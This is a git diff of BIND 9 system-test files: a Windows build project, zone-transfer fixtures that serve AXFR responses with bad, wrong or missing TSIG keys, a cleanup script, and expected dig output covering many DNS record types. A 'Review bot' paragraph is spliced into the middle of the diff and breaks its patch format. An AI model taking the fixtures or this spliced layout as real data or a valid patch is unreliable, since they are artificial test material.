+ <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles>
+ <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;..\..\..\..\lib\irs\win32\include;..\..\..\..\lib\irs\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+
<CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);..\..\..\..\lib\irs\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;libirs.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + 
<AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;..\..\..\..\lib\irs\win32\include;..\..\..\..\lib\irs\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);..\..\..\..\lib\irs\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;libirs.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\resolve.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/resolve.vcxproj.user b/bin/tests/system/win32/resolve.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/resolve.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file
diff --git a/bin/tests/system/xfer/ans5/badkeydata b/bin/tests/system/xfer/ans5/badkeydata
new file mode 100644
index 0000000..8dc80fb
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/badkeydata
@@ -0,0 +1,10 @@
+/SOA tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300
+/AXFR tsig_key abcd1234ffff/
+nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300
+/AXFR tsig_key abcd1234ffff/
+nil. 300 NS ns.nil.
+nil. 300 TXT "bad keydata AXFR"
+a.nil. 60 A 10.0.0.61
+/AXFR tsig_key abcd1234ffff/
+nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300
diff --git a/bin/tests/system/xfer/ans5/badmessageid b/bin/tests/system/xfer/ans5/badmessageid
new file mode 100644
index 0000000..e0dc041
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/badmessageid
@@ -0,0 +1,10 @@
+/SOA tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
+/AXFR bad-id tsig_key LSAnCU+Z/
+nil. 300 NS ns.nil.
+nil. 300 TXT "bad message id"
+a.nil. 60 A 10.0.0.61
+/AXFR bad-id tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
diff --git a/bin/tests/system/xfer/ans5/goodaxfr b/bin/tests/system/xfer/ans5/goodaxfr
new file mode 100644
index 0000000..e5ccd43
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/goodaxfr
@@ -0,0 +1,10 @@
+/SOA tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 NS ns.nil.
+nil. 300 TXT "initial AXFR"
+a.nil. 60 A 10.0.0.61
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
diff --git a/bin/tests/system/xfer/ans5/partial b/bin/tests/system/xfer/ans5/partial
new file mode 100644
index 0000000..e7eff8e
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/partial
@@ -0,0 +1,11 @@
+/SOA tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300
+/AXFR/
+nil. 300 NS ns.nil.
+nil. 300 TXT "partially signed AXFR"
+a.nil. 60 A 10.0.0.61
+b.nil. 60 A 10.0.0.62
+/AXFR/
+nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300
diff --git a/bin/tests/system/xfer/ans5/soamismatch b/bin/tests/system/xfer/ans5/soamismatch
new file mode 100644
index 0000000..14cfa41
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/soamismatch
@@ -0,0 +1,10 @@
+/SOA tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 NS ns.nil.
+nil. 300 TXT "SOA mismatch AXFR"
+a.nil. 60 A 10.0.0.61
+/AXFR tsig_key LSAnCU+Z/
+nil. 300 SOA whatever. other. 1 300 300 604800 300
diff --git a/bin/tests/system/xfer/ans5/unknownkey b/bin/tests/system/xfer/ans5/unknownkey
new file mode 100644
index 0000000..da7889b
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/unknownkey
@@ -0,0 +1,11 @@
+/SOA bad_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 5 300 300 604800 300
+/AXFR bad_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 5 300 300 604800 300
+/AXFR bad_key LSAnCU+Z/
+nil. 300 NS ns.nil.
+nil. 300 TXT "unknown key AXFR"
+a.nil. 60 A 10.0.0.61
+b.nil. 60 A 10.0.0.62
+/AXFR bad_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 5 300 300 604800 300
diff --git a/bin/tests/system/xfer/ans5/unsigned b/bin/tests/system/xfer/ans5/unsigned
new file mode 100644
index 0000000..3fe04db
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/unsigned
@@ -0,0 +1,11 @@
+/SOA tsig_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300
+/AXFR/
+nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300
+/AXFR/
+nil. 300 NS ns.nil.
+nil. 300 TXT "unsigned AXFR"
+a.nil. 60 A 10.0.0.61
+b.nil. 60 A 10.0.0.62
+/AXFR/
+nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300
diff --git a/bin/tests/system/xfer/ans5/wrongkey b/bin/tests/system/xfer/ans5/wrongkey
new file mode 100644
index 0000000..af120b0
--- /dev/null
+++ b/bin/tests/system/xfer/ans5/wrongkey
@@ -0,0 +1,11 @@
+/SOA unused_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 6 300 300 604800 300
+/AXFR unused_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 6 300 300 604800 300
+/AXFR unused_key LSAnCU+Z/
+nil. 300 NS ns.nil.
+nil. 300 TXT "incorrect key AXFR"
+a.nil. 60 A 10.0.0.61
+b.nil. 60 A 10.0.0.62
+/AXFR unused_key LSAnCU+Z/
+nil. 300 SOA ns.nil. root.nil. 6 300 300 604800 300
diff --git a/bin/tests/system/xfer/axfr-stats.good b/bin/tests/system/xfer/axfr-stats.good
new file mode 100644
index 0000000..264af09
--- /dev/null
+++ b/bin/tests/system/xfer/axfr-stats.good
@@ -0,0 +1,3 @@
+messages=16
+records=10003
+bytes=218227
diff --git a/bin/tests/system/xfer/clean.sh b/bin/tests/system/xfer/clean.sh
new file mode 100644
index 0000000..2851553
--- /dev/null
+++ b/bin/tests/system/xfer/clean.sh
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after zone transfer tests.
+#
+
+rm -f */ans.run
+rm -f */named.conf
+rm -f */named.memstats
+rm -f */named.run
+rm -f */named.run.prev
+rm -f axfr.out
+rm -f dig.out.*
+rm -f ns*/managed-keys.bind*
+rm -f ns*/named.lock
+rm -f ns1/edns-expire.db
+rm -f ns1/ixfr-too-big.db ns1/ixfr-too-big.db.jnl
+rm -f ns1/sec.db ns2/sec.db
+rm -f ns2/example.db ns2/tsigzone.db ns2/example.db.jnl
+rm -f ns2/mapped.db
+rm -f ns3/example.bk ns3/xfer-stats.bk ns3/tsigzone.bk ns3/example.bk.jnl
+rm -f ns3/mapped.bk
+rm -f ns3/primary.bk ns3/primary.bk.jnl
+rm -f ns4/*.db ns4/*.jnl
+rm -f ns6/*.db ns6/*.bk ns6/*.jnl
+rm -f ns7/*.db ns7/*.bk ns7/*.jnl
+rm -f ns8/large.db ns8/small.db
+rm -f stats.*
diff --git a/bin/tests/system/xfer/dig1.good b/bin/tests/system/xfer/dig1.good
new file mode 100644
index 0000000..9fa5437
--- /dev/null
+++ b/bin/tests/system/xfer/dig1.good
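Review bot: Every `rm -f` in the new clean.sh uses a path relative to the current directory (`*/named.conf`, `ns4/*.db`, `stats.*`), and nothing in the script pins that directory, so a run from anywhere else deletes whatever matches there and leaves the test artifacts in place. Presumably the test runner changes into the xfer directory before calling it, but that is not visible in this diff. Adding `cd "$(dirname "$0")" || exit 1` ahead of the first `rm` would make the script safe to invoke directly; at minimum a comment such as `# Must be run from the xfer test directory.` should state the requirement.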
@@ -0,0 +1,178 @@ +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051952 5 5 1814400 3600 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +a01.example. 3600 IN A 0.0.0.0 +a02.example. 3600 IN A 255.255.255.255 +a601.example. 3600 IN A6 0 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +a601.example. 3600 IN A6 64 ::ffff:ffff:ffff:ffff foo. +a601.example. 3600 IN A6 127 ::1 foo. +a601.example. 3600 IN A6 128 . +aaaa01.example. 3600 IN AAAA ::1 +aaaa02.example. 3600 IN AAAA fd92:7065:b8e:ffff::5 +afsdb01.example. 3600 IN AFSDB 0 hostname.example. +afsdb02.example. 3600 IN AFSDB 65535 . +amtrelay01.example. 3600 IN AMTRELAY 0 0 0 +amtrelay02.example. 3600 IN AMTRELAY 0 1 0 +amtrelay03.example. 3600 IN AMTRELAY 0 0 1 0.0.0.0 +amtrelay04.example. 3600 IN AMTRELAY 0 0 2 :: +amtrelay05.example. 3600 IN AMTRELAY 0 0 3 example.net. +amtrelay06.example. 3600 IN AMTRELAY \# 2 0004 +apl01.example. 3600 IN APL !1:10.0.0.1/32 1:10.0.0.0/24 +apl02.example. 3600 IN APL +atma01.example. 3600 IN ATMA +61200000000 +atma02.example. 3600 IN ATMA +61200000000 +atma03.example. 3600 IN ATMA 1234567890abcdef +atma04.example. 3600 IN ATMA fedcba0987654321 +avc.example. 3600 IN AVC "foo:bar" +caa01.example. 3600 IN CAA 0 issue "ca.example.net; policy=ev" +caa02.example. 3600 IN CAA 128 tbs "Unknown" +caa03.example. 3600 IN CAA 128 tbs "" +cdnskey01.example. 3600 IN CDNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +cds01.example. 3600 IN CDS 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +cert01.example. 3600 IN CERT 65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example. 3600 IN CNAME cname-target. +cname02.example. 3600 IN CNAME cname-target.example. +cname03.example. 3600 IN CNAME . +csync01.example. 3600 IN CSYNC 0 0 A NS AAAA +csync02.example. 
3600 IN CSYNC 0 0 +dhcid01.example. 3600 IN DHCID AAIBY2/AuCccgoJbsaxcQc9TUapptP69lOjxfNuVAA2kjEA= +dhcid02.example. 3600 IN DHCID AAEBOSD+XR3Os/0LozeXVqcNc7FwCfQdWL3b/NaiUDlW2No= +dhcid03.example. 3600 IN DHCID AAABxLmlskllE0MVjd57zHcWmEH3pCQ6VytcKD//7es/deY= +dlv.example. 3600 IN DLV 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +dname01.example. 3600 IN DNAME dname-target. +dname02.example. 3600 IN DNAME dname-target.example. +dname03.example. 3600 IN DNAME . +doa01.example. 3600 IN DOA 1234567890 1234567890 1 "image/gif" R0lGODlhKAAZAOMCAGZmZgBmmf///zOZzMz//5nM/zNmmWbM/5nMzMzMzACZ/////////////////////yH5BAEKAA8ALAAAAAAoABkAAATH8IFJK5U2a4337F5ogRkpnoCJrly7PrCKyh8c3HgAhzT35MDbbtO7/IJIHbGiOiaTxVTpSVWWLqNq1UVyapNS1wd3OAxug0LhnCubcVhsxysQnOt4ATpvvzHlFzl1AwODhWeFAgRpen5/UhheAYMFdUB4SFcpGEGGdQeCAqBBLTuSk30EeXd9pEsAbKGxjHqDSE0Sp6ixN4N1BJmbc7lIhmsBich1awPAjkY1SZR8bJWrz382SGqIBQQFQd4IsUTaX+ceuudPEQA7 +doa02.example. 3600 IN DOA 0 1 2 "" aHR0cHM6Ly93d3cuaXNjLm9yZy8= +ds01.example. 3600 IN NS ns42.example. +ds01.example. 3600 IN DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ds02.example. 3600 IN NS ns43.example. +ds02.example. 3600 IN DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 +eid01.example. 3600 IN EID 1289AB +eui48.example. 3600 IN EUI48 01-23-45-67-89-ab +eui64.example. 3600 IN EUI64 01-23-45-67-89-ab-cd-ef +gid01.example. 3600 IN GID \# 1 03 +unspec01.example. 3600 IN UNSPEC \# 1 04 +gpos01.example. 3600 IN GPOS "-22.6882" "116.8652" "250.0" +gpos02.example. 3600 IN GPOS "" "" "" +hinfo01.example. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example. 3600 IN HINFO "PC" "NetBSD" +hip1.example. 3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D +hip2.example. 
3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D rvs.example.com. +https0.example. 3600 IN HTTPS 0 example.net. +https1.example. 3600 IN HTTPS 1 . port=60 +ipseckey01.example. 3600 IN IPSECKEY 10 1 2 192.0.2.38 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey02.example. 3600 IN IPSECKEY 10 0 2 . AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey03.example. 3600 IN IPSECKEY 10 1 2 192.0.2.3 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey04.example. 3600 IN IPSECKEY 10 3 2 mygateway.example.com. AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey05.example. 3600 IN IPSECKEY 10 2 2 2001:db8:0:8002::2000:1 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +isdn01.example. 3600 IN ISDN "isdn-address" +isdn02.example. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example. 3600 IN ISDN "isdn-address" +isdn04.example. 3600 IN ISDN "isdn-address" "subaddress" +dnskey01.example. 3600 IN DNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +keydata.example. 3600 IN TYPE65533 \# 0 +keydata.example. 3600 IN TYPE65533 \# 6 010203040506 +keydata.example. 3600 IN TYPE65533 \# 18 010203040506010203040506010203040506 +kx01.example. 3600 IN KX 10 kdc.example. +kx02.example. 3600 IN KX 10 . +loc01.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +l32.example. 3600 IN L32 10 1.2.3.4 +l64.example. 3600 IN L64 10 14:4fff:ff20:ee64 +lp.example. 3600 IN LP 10 example.net. +nid.example. 3600 IN NID 10 14:4fff:ff20:ee64 +mb01.example. 3600 IN MG madname.example. +mb02.example. 3600 IN MG . +mg01.example. 3600 IN MG mgmname.example. +mg02.example. 3600 IN MG . +minfo01.example. 
3600 IN MINFO rmailbx.example. emailbx.example. +minfo02.example. 3600 IN MINFO . . +mr01.example. 3600 IN MR mrname.example. +mr02.example. 3600 IN MR . +mx01.example. 3600 IN MX 10 mail.example. +mx02.example. 3600 IN MX 10 . +naptr01.example. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nimloc01.example. 3600 IN NIMLOC 1289AB +ninfo01.example. 3600 IN NINFO "foo" +ninfo02.example. 3600 IN NINFO "foo" "bar" +ninfo03.example. 3600 IN NINFO "foo" +ninfo04.example. 3600 IN NINFO "foo" "bar" +ninfo05.example. 3600 IN NINFO "foo bar" +ninfo06.example. 3600 IN NINFO "foo bar" +ninfo07.example. 3600 IN NINFO "foo bar" +ninfo08.example. 3600 IN NINFO "foo\010bar" +ninfo09.example. 3600 IN NINFO "foo\010bar" +ninfo10.example. 3600 IN NINFO "foo bar" +ninfo11.example. 3600 IN NINFO "\"foo\"" +ninfo12.example. 3600 IN NINFO "\"foo\"" +ninfo13.example. 3600 IN NINFO "foo;" +ninfo14.example. 3600 IN NINFO "foo;" +ninfo15.example. 3600 IN NINFO "bar\\;" +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +nsap-ptr01.example. 3600 IN NSAP-PTR . +nsap-ptr01.example. 3600 IN NSAP-PTR foo. +nsap01.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsec01.example. 3600 IN NSEC a.secure.nil. NS SOA MX LOC RRSIG NSEC DNSKEY +nsec02.example. 3600 IN NSEC . NSAP-PTR NSEC +nsec03.example. 3600 IN NSEC . A +nsec04.example. 3600 IN NSEC . TYPE127 +openpgpkey.example. 3600 IN OPENPGPKEY AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +ptr01.example. 3600 IN PTR example. +px01.example. 3600 IN PX 65535 foo. bar. +px02.example. 3600 IN PX 65535 . . +rkey01.example. 
3600 IN RKEY 0 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +rp01.example. 3600 IN RP mbox-dname.example. txt-dname.example. +rp02.example. 3600 IN RP . . +rt01.example. 3600 IN RT 0 intermediate-host.example. +rt02.example. 3600 IN RT 65535 . +rrsig01.example. 3600 IN RRSIG NSEC 1 3 3600 20000102030405 19961211100908 2143 foo.nil. MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +spf01.example. 3600 IN SPF "v=spf1 -all" +spf02.example. 3600 IN SPF "v=spf1" " -all" +sshfp01.example. 3600 IN SSHFP 4 2 C76D8329954DA2835751E371544E963EFDA099080D6C58DD2BFD9A31 6E162C83 +sshfp02.example. 3600 IN SSHFP 1 2 BF29468C83AC58CCF8C85AB7B3BEB054ECF1E38512B8353AB36471FA 88961DCC +sink01.example. 3600 IN SINK 1 0 0 +sink02.example. 3600 IN SINK 8 0 2 l4ik +smimea.example. 3600 IN SMIMEA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +srv01.example. 3600 IN SRV 0 0 0 . +srv02.example. 3600 IN SRV 65535 65535 65535 old-slow-box.example. +svcb0.example. 3600 IN SVCB 0 example.net. +svcb1.example. 3600 IN SVCB 1 . port=60 +ta.example. 3600 IN TA 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +talink0.example. 3600 IN TALINK . talink1.example. +talink1.example. 3600 IN TALINK talink0.example. talink2.example. +talink2.example. 3600 IN TALINK talink2.example. . +tlsa.example. 3600 IN TLSA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +txt01.example. 3600 IN TXT "foo" +txt02.example. 3600 IN TXT "foo" "bar" +txt03.example. 3600 IN TXT "foo" +txt04.example. 3600 IN TXT "foo" "bar" +txt05.example. 3600 IN TXT "foo bar" +txt06.example. 3600 IN TXT "foo bar" +txt07.example. 3600 IN TXT "foo bar" +txt08.example. 
3600 IN TXT "foo\010bar" +txt09.example. 3600 IN TXT "foo\010bar" +txt10.example. 3600 IN TXT "foo bar" +txt11.example. 3600 IN TXT "\"foo\"" +txt12.example. 3600 IN TXT "\"foo\"" +txt13.example. 3600 IN TXT "foo;" +txt14.example. 3600 IN TXT "foo;" +txt15.example. 3600 IN TXT "bar\\;" +uid01.example. 3600 IN UID \# 1 02 +uinfo01.example. 3600 IN UINFO \# 1 01 +uri01.example. 3600 IN URI 10 20 "https://www.isc.org/" +uri02.example. 3600 IN URI 30 40 "https://www.isc.org/HolyCowThisSureIsAVeryLongURIRecordIDontEvenKnowWhatSomeoneWouldEverWantWithSuchAThingButTheSpecificationRequiresThatWesupportItSoHereWeGoTestingItLaLaLaLaLaLaLaSeriouslyThoughWhyWouldYouEvenConsiderUsingAURIThisLongItSeemsLikeASillyIdeaButEnhWhatAreYouGonnaDo/" +uri03.example. 3600 IN URI 30 40 "" +wks01.example. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example. 3600 IN X25 "123456789" +zonemd01.example. 3600 IN ZONEMD 2019020700 1 1 C220B8A6ED5728A971902F7E3D4FD93ADEEA88B0453C2E8E8C863D46 5AB06CF34EB95B266398C98B59124FA239CB7EEB +zonemd02.example. 3600 IN ZONEMD 2019020700 1 2 08CFA1115C7B948C4163A901270395EA226A930CD2CBCF2FA9A5E6EB 85F37C8A4E114D884E66F176EAB121CB02DB7D652E0CC4827E7A3204 F166B47E5613FD27 +8f1tmio9avcom2k0frp92lgcumak0cad.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C 8FPNS2UCT7FBS643THP2B77PEQ77K6IU A NS SOA MX AAAA RRSIG DNSKEY NSEC3PARAM +kcd3juae64f9c5csl1kif1htaui7un0g.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C KD5MN2M20340DGO0BL7NTSB8JP4BSC7E +mr5ukvsk1l37btu4q7b1dfevft4hkqdk.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C MT38J6VG7S0SN5G17MCUF6IQIKFUAJ05 A AAAA RRSIG +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051952 5 5 1814400 3600 diff --git a/bin/tests/system/xfer/dig2.good b/bin/tests/system/xfer/dig2.good new file mode 100644 index 0000000..2229f9c --- /dev/null +++ b/bin/tests/system/xfer/dig2.good 
@@ -0,0 +1,178 @@ +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051953 5 5 1814400 3600 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +a01.example. 3600 IN A 0.0.0.1 +a02.example. 3600 IN A 255.255.255.255 +a601.example. 3600 IN A6 0 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +a601.example. 3600 IN A6 64 ::ffff:ffff:ffff:ffff foo. +a601.example. 3600 IN A6 127 ::1 foo. +a601.example. 3600 IN A6 128 . +aaaa01.example. 3600 IN AAAA ::1 +aaaa02.example. 3600 IN AAAA fd92:7065:b8e:ffff::5 +afsdb01.example. 3600 IN AFSDB 0 hostname.example. +afsdb02.example. 3600 IN AFSDB 65535 . +amtrelay01.example. 3600 IN AMTRELAY 0 0 0 +amtrelay02.example. 3600 IN AMTRELAY 0 1 0 +amtrelay03.example. 3600 IN AMTRELAY 0 0 1 0.0.0.1 +amtrelay04.example. 3600 IN AMTRELAY 0 0 2 :: +amtrelay05.example. 3600 IN AMTRELAY 0 0 3 example.net. +amtrelay06.example. 3600 IN AMTRELAY \# 2 0004 +apl01.example. 3600 IN APL !1:10.0.0.1/32 1:10.0.0.1/24 +apl02.example. 3600 IN APL +atma01.example. 3600 IN ATMA +61200000000 +atma02.example. 3600 IN ATMA +61200000000 +atma03.example. 3600 IN ATMA 1234567890abcdef +atma04.example. 3600 IN ATMA fedcba0987654321 +avc.example. 3600 IN AVC "foo:bar" +caa01.example. 3600 IN CAA 0 issue "ca.example.net; policy=ev" +caa02.example. 3600 IN CAA 128 tbs "Unknown" +caa03.example. 3600 IN CAA 128 tbs "" +cdnskey01.example. 3600 IN CDNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +cds01.example. 3600 IN CDS 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +cert01.example. 3600 IN CERT 